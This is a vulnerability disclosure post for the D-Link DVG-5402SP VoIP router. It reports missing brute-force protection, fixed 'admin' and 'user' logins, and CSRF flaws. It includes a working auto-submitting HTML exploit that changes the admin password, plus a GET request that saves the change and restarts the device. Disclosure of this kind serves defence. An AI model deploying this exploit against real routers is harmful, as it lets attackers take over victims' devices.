D-Link DVG-5402SP CSRF / Brute Force

Hello list!

There are Brute Force, Abuse of Functionality and Cross-Site Request Forgery 
vulnerabilities in D-Link DVG-5402SP VoIP Router.

-------------------------
Affected products:
-------------------------

Vulnerable is the next model: D-Link DVG-5402SP, Firmware RU_1.01. Other 
versions also must be vulnerable.

Since December 2014 the developers didn't answer me concerning 
vulnerabilities in DVG-5402SP and other D-Link devices, which I informed 
them about.

----------
Details:
----------

Brute Force (WASC-11):

http://site

There is no protection from BF attacks in login form.

Abuse of Functionality (WASC-42):

Fixed logins: "admin" and "user". Which simplifies attacks.

Cross-Site Request Forgery (WASC-09):

Change admin's password:

D-Link DVG-5402SP CSRF-1.html

<html>
<head>
<title>D-Link DVG-5402SP CSRF exploit (C) 2016 MustLive. 
http://websecurity.com.ua</title>
</head>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/goform/AspPost" method="post">
<input type="hidden" name="K13" value="1">
<input type="hidden" name="ot_confirm_password_K13" value="1">
</form>
</body>
</html>

Cross-Site Request Forgery (WASC-09):

After the change, the password must be saved and the device restarted by 
separate GET request:

http://site/ConfigBackupForm.asp

I mentioned about these vulnerabilities at my site 
(http://websecurity.com.ua/7547/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua